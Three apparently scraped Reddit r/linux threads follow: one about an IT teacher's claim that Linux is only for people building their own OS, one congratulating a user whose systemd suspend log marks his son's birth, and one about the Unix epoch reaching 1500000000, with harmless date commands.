Be weary of IT professors. There are some good ones, but a huge portion of them are actual shills. Schools and such often receive funding from hardware and software vendors to peddle their products.
>arch and gentoo are like this 

Um, I use Arch. Not only did I not build my OS, but I think it's easier to use than Ubuntu (which I gave up on years ago after being required to peek under the hood). Literally, once it is set up, there's not much fussing around except for a couple of times in 6 years when an update did something. In contrast, I work at a Windows shop where the past 3 months have been nightmares for printing and some of the other broken stuff.

I also have one Windows app that does most functions better under Linux than Windows. I hate having to boot into Windows for the couple of items that don't.
This is an opportunity to point out to your teacher their information is around 25 years out of date and educate them so they stop spreading false information.
Teacher where? A high school teacher at a rural private school in Texas, a tech school in Cambodia, or a tenured professor at Cambridge.
With a view like this, is it possible to get a refund for the course, or switch to another instructor?
Linux is only for silicon valley developers that make 300K a year.
Those who don't use linux are the ones who are scared to adapt. I'm a linux using for about 8 years now and this has absolutely changed my life ever since. And FYI your IT teacher is absolutely wrong.
There's a lot of IT Teachers out of touch with modern reality. Schools are full of them.
True for Gentoo maybe but most of the other big names have ez GUI installers and whatnot
Lots and lots of people are slamming the teacher for this statement, and without context he does sound like a bit of dick and quite out of touch,however if we take the classic 'It should be called gnu/linux' perspective the teacher is in fact correct.

Although we all routinely use 'Linux' to mean a Linux distro, Linux is in reality just the kernel, and if you want to actually use it for much, you need to build an OS from it by adding in a userland of some sort.
There are lots of those, from all the distro's we know and love here, to android, to various jeos implementations on routers and set-top-boxes, but they are all "not just Linux", they are Linux Kernel + other components, someone had to build an OS.
How, exactly, is Arch *like this*? It most definitely is not.
Lol, sounds like almost all it teachers I know. Why are they even in that position, because they know how to use word?

Did you prove him wrong and, hopefully, made a fool of him for spreading, you could say, lies - or rather misinformation?
Not even Gentoo or Arch compare with *actual* [Linux From Scratch](https://www.linuxfromscratch.org/).

I once worked at a place where we were trying to get a contract from someone who was already a client, and they turned us down, because some guy in the IT department had decided that Python was "only a scripting language" and wasn't a "*real*" programming language, so he rejected our bid to do it cheaper and faster than anyone else, because we were going to use Python.

Your IT teacher reminds me of this.  I don't know if it is personal bias or legitimate ignorance, but people like this shouldn't *work or teach* in this industry.  If your biases get in the way of using the right tool for the job, that's just as much of a problem as being too lazy to learn about the available tools and keep your knowledge up to date.  I wouldn't hire a construction worker who refused to use a screwdriver because it is more complicated to use than a hammer.  OSs and programming languages are just tools, and if you don't have at least a basic understanding of the most common/popular ones, you don't belong in tech *at all*, teaching or otherwise.

I hate people like this, because they are part of the reason many tech companies think older people can't handle the job.  Often, the older, more experienced people are many times more productive (at higher quality too), but all it takes is one of two stubborn idiots who don't or *won't* keep themselves competent to make everyone else look bad.  So we have whole tech industries dominated by young, inexperienced people who struggle to maintain productivity *and* quality, without any mentorship from more experienced people who can help them learn the pitfalls and tricks before they are forced to learn them on their own, at significant expense.  It's a travesty.
Was it a Physical Education teacher, by any chance?
Windows is ubiquitous because of the year-round multibillion dollar marketing effort. This has nothing to do with Linux or any truth or fiction about it.

As for the idea that Linux is too hard to use, that's just choice-supportive bias of people who went with the default solution. "Am I wrong for just mindlessly accepting the default software from my hardware vendor? No-no-no, the alternative is for sure inferior!" Again, this has nothing to do with Linux whatsoever.
That’s just one guy though. One IT guy.
and once again my lack of faith in the school system is proven it seems.  


using linux is absolutely not like making your own operating system XD   


using linux is like going to the store and buying the parts that are already created and using those parts to make a car.  


where building your own OS is more like buying raw iron and blacksmithing all the parts and creating your own glass from sand for the windows and also creating your own rubber for the tires and seats.
I bet that teacher's never used Linux in their entire life. I actually find KDE simpler (in some ways)!
Teacher can't tell  the difference from linux kernel and linux distro... what a joke.

You can build a flavor from linux kernel, each flavor/distro have their own goals. It's not build your own os from stratch kinda deal.

Even BSD have their flavor and goals. OpenBSD most notably for security DragonflyBSD is just bleeding edge stuff, I'm waiting for HAMMER2 filesystem.
Walk to that teacher slowly, look straight in the eyes and whisper: I use Arch BTW
Does this person even know that Ubuntu even exists?
I think they got confused by all the different distros as building their own OS.  So sad and shallow knowledge level
I don't care. Linux Desktop has *millions* of users, and Linux servers are the circulatory system of the internet. 

Linux is a  evolving lively system with multiple expressions. Its users have a dedication and affection for the OS that simply does not exist in the Windows or OSx community. 

So what about your ill-informed  professor. You survived, and I'm sure many others have too.   

And it's possible you misunderstood your professor. Linux *is* for people who want to build their own OS. You can't do that with Windows or OSx. 

You don't *have* to do that. You can install a complete pre-packaged distro every day of the month and still not hit them all. 

It doesn't matter that the millions of Windows users are happy with their Windows. So *what*? 

We loves our Linux and Linux is good for us and that's *all*  that matters.
Nice technology experiment though. My technology teacher in elementary school (they called it computer lab, but I don't know what other school calls them that,) seemed like she had an understanding of Linux, however, she never really incorporated it in her teaching. I was educated a little more on Firefox through these classes, and was treated quite well in that class. Now that I think of it, that may be the reason why I love learning about technology, but not really liking the advancements of it.
Your IT teacher is incorrect. Tell them I said so.
Linux can be what ever u want it to be. It can be easy, or hard. Depending on what you are doing, or what distro you chose.
I highly recommend anyone that's been scared away from arch in the past to try installing it in a virtual machine at least.  Now with the archinstall installer it's almost as easy as any other distro.  Highly recommend.
I would seriously question the credentials of your IT teacher..

They do realize that literally the *entire* internet runs on linux.

Go grab the latest Ubuntu and marvel at well it *just works*

Linux has been my daily driver from the days when you needed 3 floppies amd a zip drive to install it!
How does someone become an IT teacher and believe this?
The people who are in charge of picking instructors for IT are not necessarily IT savvy themselves. It seems like someone has some antiquated knowledge that hasn't been updated in a while (and was pretty wrong even back in the day)
Honestly i feel like you'd be surprised the number of people in IT that dont know or use linux so much so that to them its a foreign concept.

Ive only just begun implementing linux servers at work, and of all the people i worked with at my previous job at an MSP only one other guy knew anything about or used linux.

Ive litterally ment more IT people that use MacOS than linux.

Luckily im in a position where im teaching my coworkers a least a little bit of linux.

So all in all im not the least bit surprised, most guys in IT ive worked with think linux is for the top 1% of servers in the world but they don't realize that their VMware ESXi and vCenter is Linux based because they never have to get into the CLI until shit hits the fan.
are you running a Chromebook congratulations your using Linux ( a crap ton of schools use chromebooks)
From my experience, it seems to be a low bar to become a teacher, particularly with IT related fields. While most that I have met have generally had good intentions, their qualifications and experience rarely seemed to be as nice.
Not much of an I.T. teacher. I assume he's a substitute that only has like a certificate in using MS Office. I'd file a complaint and have him removed from teaching I.T. I.T. professionals don't go around spouting mindless garbage. If they won't remove him, I'd ask for a refund and change schools.
My computer teacher thinks javascript is a dying language so this isn't surprising
Or you built a desktop and forgot to budget for software and went, "oh crap, what's free?"
Time for your IT teacher to sit down and become the student then. Obviously, they are uninformed. 

There's no lower form of life than a so-called IT professional who thinks the end and beginning of computing is Microsoft.
If you test my "linux knowledge" skills, I'd probably come out as an average user (or maybe a tiny bit above average), and I've been running it for over 4 years just fine. My 8 year old son started his "computer life" on Pop\_OS. He's doing just fine, he can even update/upgrade from the terminal. He told me the other day that he wished they used linux in school instead of chromeOS. lol

I don't know what your teacher is smoking, how is he even a teacher?
There isn't a shortage of dumb opinions in this world... about anything.

Having barely scraped by French but with high 90's marks in all my high-school math and science courses, a guidance counselor told me I should not consider computer science as a major because I didn’t do well with languages.

/eyeroll
Just wanted to throw my use case in; Linux just makes better use of my hardware and requires less space. Sadly it isn't ready for someone like me to daily drive, but I keep coming back hoping I'll accept the switch eventually.
for most standard users these days, the browser IS their OS. For people with malware riddled Windows machines, give them a clean Ubuntu install and they barely know the difference except for the fact that 1. their printer just magically works. 2. they don't get "all those annoying messages" they don't understand. and 3. it all just gets out of their way and lets them do their thing.
That’s a quick well to tell your teacher isn’t really teach. Should be more encouraging, but using some facts that any Google search could return. There are pros and cons for any OS and ecosystem.

Linux Distro have already “built” the OS for you to consume!
It is pretty easy.  I have a 73 yo woman friend, who had window Vista on her laptop. We bought her a off lease laptop with Win 10 on it.  I them asked want to try Peppermint Linux on your old one.  She did, it works well on older hardware. 

She uses it more than the newer laptop, upstairs for email, looking up recipes, surfing the web. I put TeamViewer on it so I could help her remotely. Taught her how to update it. She uses it all the time.
She's ill informed and delusional, not to mention a very poor IT teacher to make a statement like that.
Though I'm now using windows, I had used linux mint, pop,manjaro for many years and can confirm apart from few issues like that of audio and wake from sleep issues, it worked just fine. I had a potato laptop for years and an old hdd in it and xfce never let me feel the slggishness I experienced in windows. Now I have 8 core cpu laptop and hence want to feel windows for longer untill I get bugged down and make my mind to switch to linux again :)
Your IT teacher is lost. I don't wanna make my own OS. I just wanna use a high powered older laptop for more than 1 year before I replace it.
That’s been my experience trying to move to Ubuntu.  There’s been a million different minor problems.  All of them can be fixed, but usually it’s a rabbit hole of googling and trouble shooting for things as simple as getting the audio output to default to the right device.
Your IT teacher is a moron. Find a new school.
Hooboy. So a coach needed a classroom position?
They just heard "Linux is a kernel, not a full OS" and didn't bother to look deeper into the subject, I guess?
There's so much ignorance about linux. This one IT guy tried to tell me that it's super easy to ruin your os through the terminal. I mean, it is but, the same is true in windows and mac. But you have to \_intentionally\_ do it.
we can't blame them i guess, Why do you think they settled for just teachers? not professional instructors?

They might have idea on what linux was decades ago, they keep on teaching the same since 20 years. But a lot have changed in these 20 years.

just follow your intuition on this and ignore irrelevant sources of knowledge.
Used linux my whole life, my dad worked in tech and used it because it was easier to use, and I agree unless your playing stuff like fortnite! Linux is probably the best OS ever, I couldn't live without it
That is such bullshit LOL. Seriously though what's with these IT professors always talkin this kind of shit when they have no idea what they're talkin about?
Most IT teachers were gym teachers or something and got shoehorned into the job.
I have been maintaining production Linux server environments for over 20 years. I have never built my own OS, but I have put together kernel patches etc. I don’t use Linux for my desktops, only servers. I don’t think you teacher is very experienced with a statement like that.

Dig in and start learning 😉
Reminds me of a job interview I was in for a tech support position and the guy asked me what my plans and goals were for my career and I said Linux and his response was that Linux is dying off and nobody is really using it anymore because of windows server.
Whatevs. My team of Linux admins make more than he does
Maybe he shouldn't have started in Gentoo?
I say your teacher is a moron, period.
This is just as if I would say: "Riding a car is only for people who want to die in an accident.".

It's okay to have that opinion, but it would disqualify me as a driving instructor.
This comes as a particular surprise to me, being as I've been a professional Linux systems administrator for twenty years and my current job involves tending a cluster of \~100 servers each of which has 2x20 core CPUs and about 700GB RAM.
Your IT teacher is a loser
Those that can, do. Those that can't, teach. At least in this case
For the most part he's right. It is an OS for people that like to tinker with their computer. 

It is possible for a regular non technical person to use it on a daily basis but sooner or later they run into a problem. Whether it's not working hardware or software doesn't matter. Desktop Linux is more prone to errors than Windows or Mac OS.

On top of that it gives you a lot of freedom of choice. It's NOT good for normies. They like to have it simple with a few choices max or they get overwhelmed.

So if you want mass adoption of Desktop Linux you need two things. User friendly distro which means distro that is easy to use and that most of the popular software used in the world works there. Preinstall this distro on computers because I guarantee you that 90% people don't know how to install an OS.
First, most of the IT teachers I've ever met are locked in 1978. They went from punch cards to PASCAL and that was the biggest transformation in their life. Unless you can sense a teacher is up to date and knows what's going on today, most of what they teach you is probably garbage. Get the passing note and move on, they don't want to change.

Second, I've been exclusively using Linux for over 25 years now. While the beginning of my journey was definitely rough (try to build a custom kernel on a 386 over night and come back to a compilation error in the morning...). About 10 years ago, despite my mom being careful and educated by her son's on the do's and don't, I would have to regularly reinstall her laptop. Out of spite, i forced her to migrate on Ubuntu which I thought was already quite user friendly. A few bumps in the beginning but she's now been a Linux user for 10 years and doesn't care much about it.
Let me correct the teacher;
Linux is for; 

- those who want to build their OS
- those who want to build a specific system for a factory/company/business
- those who want to build a privacy oriented environment
- those who want to tinker with their computers 
- those who want to understand how logic devices work 
- those who simply want to run a business without becoming giant thieves' b**ch
- those who want to enjoy an OS the user has the full control
- those who want to build big networks and PC farms for either CPU power or storage 
- those who prefer the donation and advertising method to the "paying and never owning" method
- those who want to customize the s*th out of their working environments
- those who want to work in media creation
- those who build IoT devices 
- those who hate big corporations which are scared of their own shadows and spend millions to set boundaries to their customers 
- those who like to play games 
- those who like the bragging rights 
- those who has no one to brag 
- for human beings 

There. I fixed it.
An already built os for people who want to build an os...okie dokie.
Dude, the first task my trainees get, is installing Gentoo in a virtual machine. Gentoo is not hard if you can read. They often have NO experience whatsoever.

Learning linux is nothing else than getting out of your comfort zone. To be fair, the usability of linux as a daily driver just got really great the last years. 20 Years ago it was a different story.
Your IT teacher is not a normal IT teacher.

In my experience they have promoted Linux at least, and in many cases been Linux enthusiasts

Though a lot of them these days are Mac enthusiasts for some reason.
Sorry that your IT teacher is an idiot.

So ... how many folks that use an Android phone or devie want to build their own OS - hell many of 'em don't even know what an operating system is - yet they're using Linux.  So, should we take all Android devices away from them, or is Linux for them too?

What about most modern cars, and especially those with "smarter" systems.  Can pretty well bet all or damn near all of 'em are running Linux or BSD.  Should we take all those cars away from all those folks that don't want to build their own OS?

Etc., etc.

And that's before we even get into more common Linux servers, desktops, laptops, etc.

I may *customize* my OS quite a bit, and also very much install it.  But *build* it, or would I even want to?  No thanks, not that interested to do that.  Gonna take Linux away from me too 'cause I don't want to build my own OS?  Sorry, but Linux is what I use, and have been using for over 23 years.  I essentially only use Microsoft or MacOS when folks are paying me to put up with it, and even work ... mostly Linux.  But even work, I don't "build" my own OS.

Yeah, your IT teacher is an idiot - sorry.

Maybe you drop your IT teacher a little anonymous note, reading:  
[https://www.reddit.com/r/linux/comments/rxs3ya/my\_it\_teacher\_said\_linux\_is\_only\_for\_people\_who/](https://www.reddit.com/r/linux/comments/rxs3ya/my_it_teacher_said_linux_is_only_for_people_who/)
And windows is for those that want to run a virus as their OS.  There is many reasons that people do not want to use Linux. this type of point of view . but also too lazy to do anything but point and click. if you cant or wont use the terminal . Then you will never see how much more you can do with it then windows .
Thats an incredibly shortsighted way of looking at things, linux powers 90% of devices today (phones, IOT, Datacenter Servers, etc) to the point where Microsoft made their own linux OS, and is constantly flirting with it with WSL. 

Your IOT lightbulb runs linux

Its simply not true.
I have a professor at my college like this. Not only do they not know of the newest technology (thinking PCI is the newest form of expansion slot) they also refuse to either take new information or insist that they're information is the most up to date because "it's on slides and curriculum from last year."

This was coming from a COMPTIA cert class that said the newest form of charging port on mobile phones was Micro B, and all phones still have AUX jacks. Laptops still have replaceable RAM and CPUs, dGPUs are expansion cards in laptops and are upgradable, and the only form of Linux is either "raw Linux" or Ubuntu. The package manager for Linux is apt btw, apparently.
This is why we should promote distros like Ubuntu and Mint. Stop recommending Manjaro and trolls.
Your IT teacher is incorrect, but in a way that's pretty common for people who have been in IT but haven't been exposed much to Linux outside of academia. 

I've done Linux From Scratch. It's a cool learning experience, but it's not required, and it's not really a relevant thing for 99% of IT people to worry about. It's useful, but not a requirement, and by the time I did it, I knew a lot of the stuff that I was doing and why from exposure to using stuff like Slackware back in the 90's. 

The thing is, apart from giving me some extra insights into "how it all _really_ works," though, or wasn't an essential experience, and it's miles from the kinds of actual problems that I have used Linux to solve throughout my career.

If all you've ever done is worked in academia, the practical uses as something other than a teaching tool might be lost. That might be the case, but from experience it sounds like someone who developed their skills in during the Microsoft monoculture of the 90's-00's. Basically, once they could no longer (weakly even by the late 90's) argue that "Linux is just a toy, you can't do anything real with Free software/you can't use Free software for business" with any level of credibility, they started spinning that admonishment as a backhanded compliment--usually something like, "well, it's great for embedded systems and legacy hardware but nothing else" or "it's a useful learning tool, but it's too difficult/complex/whatever to be a replacement for Windows."

They probably don't have anything personal against Linux, they probably just don't understand it well enough. Worrying for an IT instructor, but not uncommon.
OP you might want to think about a different school, these are some pretty big red flags.
Wow. So, there are only two Linux distributions - Arch and Gentoo. Everything else is GNU. That's some GNU information.
My teacher makes for loops like this (Java) 

"

for(smth)

{ code line 1

Code line 2

Code line 3

...

}

"

This is no joke
You're definitely going to have to correct this guy lol
Next time just point out that Linux is the dominant OS used on AWS and other clouds.   Businesses depend on the cloud and the cloud predominantly runs Linux.
Someone being an IT teacher doesn't imply that they are knowledgeable about Linux, they might be specializing in Windows only and barely know anything Linux at all. Also, since you say "teacher" instead of "professor", I assume you mean a school teacher, so the level of expectation should be even lower. Just ignore what they have said, don't argue with them so that you don't make an enemy of out of them and move along.
I'm sure this level of lack of knowledge would lead to your mind exploding when they find out some phones straight up run linux.    Like the Pine phone or Librum 5.
Arch is not that hard.  It's like 20 minutes of following directions then you do what you want.
Unfortunately that is still the perception because when it comes to UX, Linux is still not quite on the same level as Windows, and you can't really yet get by on Linux without at least some advanced knowledge of the inner workings.
Damn how stupid is your IT teacher.
I ditched Windows for Linux when a new "GNOME Live CD" came out in 2004 and I booted it up with a full suite of tools. At the time I was curious why the boot screen said "Ubuntu" but it looked cool.   I didn't have to do any kind of install to explore Linux in a meaningful way and that actually inspired me to install it anyway.  The first thing I noticed was that even though it was very different from windows, nearly all of the configuration files had HELPFUL COMMENTS with explanations in PLAIN TEXT.  This made it very accessible (much more so than the esoteric voodoo of Windows registry files).  Furthermore I never felt like my Linux system was trying to keep me out or hide things from me on purpose. I had limited experience in UNIX-Like user spaces and knew the difference between security restrictions and an operating system designed to keep even its administrators and operators out of the loop on its inner workings.   18 years ago I didn't have to program anything to have a better-than-Windows experience and that's still true today.
Lmao. Ask him if google’s phones runs Android?
I have worked in IT for 3.5 decades.

I do Linux server performance management for a Fortune 15.

I make well north of six figures.

And a lot of my friends and colleagues make similar salaries.

And if your teacher knew jack squat about IT, they'd be doing the same. Not teaching.

_"Those who can, do. Those who can't, teach."_
The problem is Linux has no overarching graphical or naming unity. 

Case in point a friend had started using Ubuntu 18.04 before the Pandemic. Got laid off, became an alcoholic. He quit drinking 2 months ago and is getting back to work. Wants to pick Linux back up so got another PC and installed 20.04. 

He couldn't find half of what he use to use for basic shit like the file explorer and had to relearn it. 

Linux ONLY works if you know the fundamentals. Installing software, moving files, making system changes, installing drivers is fucking complicated if you are a basic user. 

Having to proactively look for hardware that plays nice with Linux is a big part too. And if you happen to get a device that does not. Either spend a week figuring out HOW to install it properly instead of using it hurts.
LMAO your teacher got you so mad you went to reddit to make a post about it.

In all seriousness most university(i am assuming) teachers get in uni though their friends. A lot of them are horribly uneducated. Same is also true(a lot more so) in schools.
I had a math teacher in hs that never heard of imaginary numbers (i.e. square root of -1) and refused to admit I knew more about math than he did.

Bet your IT teacher has no special qualifications in IT. Lots of schools just fill the gaps with whatever teacher is available for classes outside of math, science, English and history.
Ok, i started on Linux in early 99 year and mi first installation was a Redhat 4 and Conectiva Linux and i didn't understand so much, then i started to trying distros like debian, slackware and finally in 2002 i tried a full customized Gentoo Linux, was a delight but took me one week to have the system up and running perfectly.

I love that experience i learn most of most valuable things from the Core of any Linux system, a very appreciated knowledge for me. I also tried other things like BSD and I learned a lot too.

I worked with Linux until now and the amount of people that use Linux grown a lot because there are an awesome work in many very friendly distros that only need a few clicks to deploy, that is amazing because to be a great user you don't need to know how to compile a kernel or what pieces of software your distribution have, you only need to start to use any distro and get fun.

Today you on any windows 10  may just with one comand deploy inside windows a Ubuntu distribution (WSL) and use native Linux apps there and launch them as any application (using wsl under the table), that kind of thing prove that Linux is extremely flexible OS and this is the why Linux is the most dominant OS in serious business and have huge amount of people that using a Linux distribution as his/her main OS.

I feel very proud of my experience (decades) with Linux and i was a very Core Linux user compiled my own stuff many times but i strated with a full distro as any new user today. 

I also was for many years an IT teacher and i feel that phrase(Linux is only for who what build his own OS) about Linux only may come from someone that know almost nothing about Linux.
When was this? Please say at least 20 years ago.
tell him he's an idiot and drop out
You should get Pop!_OS or whatever your fav distro is up and running on a VM for him.
Had a teacher say something pretty similar and I absolutely agree that it's perpetuating the stereotype of it being "impossible to learn".  I'm torn between trying to introduce/get people to convert to Linux and loving the fact that it's not really mainstream
I've had Win 10 on this computer for several years. Not once did I have to go to the command line and install something special to fix something that quit working like the sound.

I've never once installed any linux that just worked. Every time, there are a handful of aggravating problems that just won't stay working, usually sound or wi-fi.

The longest run was a laptop that had Elementary OS that I used as a VMWare VDI attachment device. That didn't have the need for sound or wifi. It was blocked from the internet so it never tried to update.
most people are not interested in using the terminal and typing sudo or using a package manager… i like it, but most people couldn’t care less
Rebuttal - Teaching is only for people who can't make their own path.
Linux will never be mainstream
So what it'd just software who cares
I think that what your professor was saying can be interpreted in the following way, which to me makes more sense: using linux for a long time without problems requires that you are comfortable enough with all the bits of your OS, to a level that gives you a good understanding what's involved in creating an OS. 

Let me exemplify: your linux fails to boot: you have to know what a bootloader is and how to recover from a failing one; your wifi doesn't work: you have to know which level of the wifi connection you have issues, the NetworkManager daemon, or maybe the kernel module, etc - and know how to debug those specific problems; your linux doesn't start a graphical environment: you have to know what the different services for starting it are, you have to know how to debug/configure your video driver.

Even though there are distributions out there that pave over these issues with a lot of shiny graphical tools, if you use linux long enough, you'll stumble into at least one of them, and it will require more knowledge than a casual user would have.

If you think about it like this, I'm sure you'll agree that his remark was not probably intended to paint it in a "impossible to use" light, but more like a warning that as a user, you'll probably need to get your hands dirty. A lot of young people fall into the trap of considering their elders as idiots just because they don't understand fully what they're trying to tell them.
It's ignorance. They don't know Linux runs the world of the large and the small, just not normal people's desktops.

People who are very invested in all they have learnt about Windows are scared of being put back at beginner. Some out of date IT people and developers are some of the worse for this.
"Linux is free only if you don't value your time." Same vibe. I wonder where that phrase came from... 

Both of the individuals would be surprised that me picking up Linux Mint and just use it like I would Windows (sans the games) would take a lot less time, skill, and effort. Perhaps it was somewhat true several decades ago?
Tell me that your IT teacher does not understand anything from Linux without saying that he does not unterstand it...
Microsoft is actively "supporting" teachers with free or vastly reduced products.

Not only do they get  the software for (nearly) free, they also get a lot of documentation. Part of this are more or less prepared lessons for classes and if you are a teacher that feels like preferring a free afternoon rather than prepare material for the next IT class, you can use the shit MS throws at you. 

Not being very IT-savvy helps, too.  The number of times I have encountered people who "know computers"  but in fact only know pushing the mouse over a graphic surface ....
So good IT teachers use linux, then.
What a nonsense.

If I wanted to build my own OS, I would build my own OS, not use OS that someone else has built, wouldn't I?
> This is exactly why people think linux is impossible to learn and can't be used ever

No it's not.

People do not care at all about the operating system, they just want to use some features: give them a reasonable way to do their stuff and they can use whatever system you install for them.
Lol what city are you in
In my experience IT teachers are absolute morons, all 4 "teachers" up to the end of high school were really just an adult in the room. Rivalling PE teachers on the give-a-crap scale.
That’s some art teacher who just got IT thing to earn more money. Hate that kind. Obviously lacking knowledge.
I see a lot of we installed xyz for this one and that one. Tbh if that same this one and that was forced to format their drives, install all of windows or any other os and connect themselves to wifi or whatever I tjink they would most probably have a tuff time anyways and asked for your help, or do you think otherwise?

So, what's really the diff? I believe, The type of user we talking about (and this is most probably the bulk of people) will be fine if a modern linux comes prei-installed. But until MS and computer manufacturers give those options this monopoly is what it will be.
Almost a decade ago, my date's Windows went fizzy for some reason. I handed her my live USB and told her I can try and fix her Windows in a week, and this should hold her over until then.

Next week came and she asked me to install the OS I had on the USB key on her PC. She's still using Linux to this day.
He is not fully wrong.

Probably the biggest linux adventage, is the fact you CAN build your own OS if you want
I've leaved win10 after all that Microsoft schizophrenia, now I'm using Mint with Cinnamon. When you're in all default apps, it feels like that good old win7/xp, with much more possibilities. But if you want something *different*, you must read MBytes of text and dive into a terminal. Sad but true. You just don't have an option "download shareware, make what you need with two clicks and forget it".  But "per se" terminal make sometimes things easier and much faster. Sometimes.
It was a different world when everyone using a computer was a computer enthusiast.
Ask him why basically every server in the world is based on some kind of linux?

Ask him why bot the best hypervisors in the world (proxmox, vmware) use a linux kernel ?

ask him why the most used mobile operating system in the world uses a linux kernel?
Most IT teachers don't know a single thing about IT. They are teachers from another subject that cover the lesson.
even Arch can be easy to use with Manjaro!
It's a very common practice for teachers to over simplify concepts. Don't mald so hard over it
Last few months I realized the Windows ntfs filesystem is so bad and fragile. I always have more issues with the windows operating system. Linux file system is so solid.
`Oct 03 22:52:59 bubbleman systemd-sleep[181913]: Suspending system...`

Why, you might ask? Well, the second my SO shouted from upstairs that the water broke, I slammed my laptop together, resulting in this log line. A couple of hours later, my second son was born. Should I maybe frame this and put above his crib?

EDIT: Awards! Wow! Thank you very much :)
[deleted]
`Personal life succesfully suspended.`

Congratulations on the baby.
It's only a matter of time until Poettering sees this and creates the first fully automated Linux midwife, called `systemd-deliverd`.

Congrats!
Congrats and what's the newborns kernel parameters? I'm betting it didn't include quiet but definitely included splash.
Not often do you get to know the exact time/date of big life events - awesome stuff!
You said "the water broke" as opposed to "her water broke" and I was forced to conclude that your SO was a pregnant faucet.
Wait, you can use Linux and have someone to look at you?

25 years of liars!
[deleted]
_Didn't expect this on r/linux_  

Congratulations to you and SO on cutting the cord and upgrading your baby from LAN to WLAN.  
I wish you both much wisdom in customizing, supporting, debuging a second OS, which is not a clone but a whole separate image.  
For your environment to be at optimal operating conditions and for your code of guidance to serve and support well for years to come, for trouble free optimal operation and prosperous results.
 lovely! love it! You should definitely frame it!
Shortly after that:

    Oct 16 03:12:52 bubbleman systemd-sleep[47592]: Waking up from suspend, wake-up source: baby!
    Oct 16 03:37:42 bubbleman systemd-sleep[47592]: Waking up from suspend, wake-up source: baby!
    Oct 16 03:59:32 bubbleman systemd-sleep[47592]: Waking up from suspend, wake-up source: baby!
    Oct 16 04:08:22 bubbleman systemd-sleep[47592]: Waking up from suspend, wake-up source: baby!
    ....
[deleted]
Soon you'll have to be worrying about what distro to run..
Congrats OP! When I read the first line I thought bubbleman was some fancy IoT water dispenser that your wife was complaining about.
Coming soon:  
`Oct 13 03:13:47 bubbleman kernel[0] : Wake reason = BBY2`
>Sudo apt install offspring

Too bad this isn't Android, because

>adb PUSH offspring

works even better.
Always a shock when suspend works right, isn't it? 

Kidding, congrats OP.
Congrats!

Definitely an interesting way you'll be able to remember such a big event like this, haha.
So was he born on the 4th? If so...that's also my birthday. Also, this is a big Texas Size 10/4, good buddy! :)
Man, the things people do to get more users for Linux.  
Has your first son mastered bash yet?
Congratulations, but that's the last sleep that will be had for a while.  :-)
cheers
Father of 3 boys (13, 8, & 5 years old) and...my baby girl was born Jan. 5th "year of the dumpster fire". I was keyboard jockeying around in my purely open source lab environment when my wife yelled for me and the midwife. I managed to come to a knee-sliding stop at the end of the claw-foot tub moments before my daughter crowned and landed in my hands. That little nugget is the best thing that's happened to me in a long while, and continues to be 9 months later. Don't tell my boys that their little sister is my favorite. It's best if they don't know they've been usurped. 

So from one Linux lovin' dad to the next, **congratulations**! And as for the sleep, just adopt the baby's schedule as much as you're able. Also, co-sleeping breastfed baby's are a breeze compared to bottle-fed cribbed babies, at least that's what my wife tells me. 

All the best!
You could call him "bubbleman"!

And sing him the song

    bubbleman sleep
    bubbleman sleep
    suspended will your system be
    dreaming will the bubbleman be
    system-dee, sleep
[deleted]
Congratulations u/Mickeelm!  I hope Mommy and Son #2 are healthy and home! All the best!
`sudo pacman -S baby`
Congratulations!

By all means preserve the moment somehow.

Perhaps give the new rug rat the nickname `bubbleman`. One day when asked how the nickname was derived, pull out the scrap book and with hugs and tears, share the story.

The story gets retold some day when the kid is famous and gets interviewed.
I feel dumb. I don't get it.
Holy shit! Congratulations brother
*successful fork*
Congratulations!
Just curious, but since you pretty much give away the sex of your SO (because obviously women are the ones who give birth), why use terms like "SO" and "the [water broke]", which are typically used when someone does not want to give away the sex of their partner?
What a story! You'll have to tell your child about the log!
Congrats!

Are you going to name him Bubbleboy? =)
I think it will be such a cool idea to hang above a crib since it would seem like it is referring to your child sleeping. Congrats OP
[removed]
I dunno if you should frame that but you should think about a job in computer forensics analysis. I mean it pays well and diapers aren't cheap.
Took me a while to figure out I wasn't on /r/homeassistant and this wasn't a post about home automation saving your house from flooding.

Congrats OP!
Congrats!
Congrats!

(also as a dad, good luck!)
So we're in the mega man AU where bubbleman was a human superhero.

This is the flash at the beginning where you see him as a baby
And how is young Linus?
Did you name your son Linus? He deserves that name :p
please save this log :D
Congratulations!!! <3
Frame it - it seems like a brilliant thing to keep for the future, to know that very exact second it started.
Congratulations!

/r/Synchronicities would love this.
So will his nickname be "bubbleman"?
So you successfully forked your process!
Congratulations!
Enjoy your sleep because you won't be getting any for the next 5 years.
Truly Beautiful. I would definitely frame this!
Congratulations!!
congratz man!
u/mickeelm I see a nerdy birth announcement card in your future🥳💙
Congratulations!
Congratulations!!
And once the newborn comes home and *you* get less sleep, the log line will read:

    Oct 03 22:52:59 bubbleman systemd-sleep[181913]: Suspending sleep...

Congrats!
[deleted]
This is the stupidest, most pointless post
[deleted]
>Should I maybe frame this and put above his crib?

Yes please. Congratulations !
This subreddit has been degrading in quality a lot. I'd love to see a Linux subreddit with only technical posts allowed.
In my time zone, tomorrow, July 13th at 8:40PM MDT, the Unix epoch will flip over to 1500000000.

That's Friday, July 14, 2017 2:40:00 GMT.

You can observe this by logging in to most any up-to-date *IX box and typing the following command:

    $ printf '%(%s)T\n' -1

or, to have it automatically update, try this:

    $ while [ 1 ] ; do printf '%(%s)T\n' -1 ; sleep 1 ; done

Please note that your results may vary; ~~the above commands should be POSIX compliant.~~ the above command should work in your bash shell.

Enjoy,
Blue

[EDIT timezone typo and added GMT. Thanks for the suggestions.]

EDIT: As many of you have noted, my one-liner isn't POSIX compliant. I'm grateful for the gracious feedback. A good example is /u/jbovlaste's script, further down; however hers/his is just one of many. The community here is excellent. Thanks!
Alternative title: it will soon be 1500000000 seconds after January 1, 1970!
Linux users can also do

`watch -n 1 date +%s`
For local time when it will occur.

    date -d @1500000000
Can't wait!

    watch -n 1 'echo $((1500000000-$(date +%s)))'

Swap \n out with \r in the loop \o/
Cant believe. I still remember celebrating 1000000000 like it was yesterday. 
FWIW, it's MDT not MST.

MST = Mountain Standard Time (not daylight savings)

MDT = Mountain Daylight Time

It's actually an important distinction, because Arizona and some other areas don't observe daylight savings, meaning they're perpetually on MST. The flip will occur at 8:40 PM MDT, 7:40PM MST.

Time is hard.
Damn. When it was about to flip to 1000000000, I summited a story about it to slashdot.org. It turns out I'm old.
And [2147483648](https://en.wikipedia.org/wiki/Year_2038_problem) draws ever closer...
Beautiful.

https://imgur.com/a/vTBgD
[deleted]
Happy 1500000000 seconds everyone!
Happy new digit everyone
> Please note that your results may vary; the above commands should be POSIX compliant.

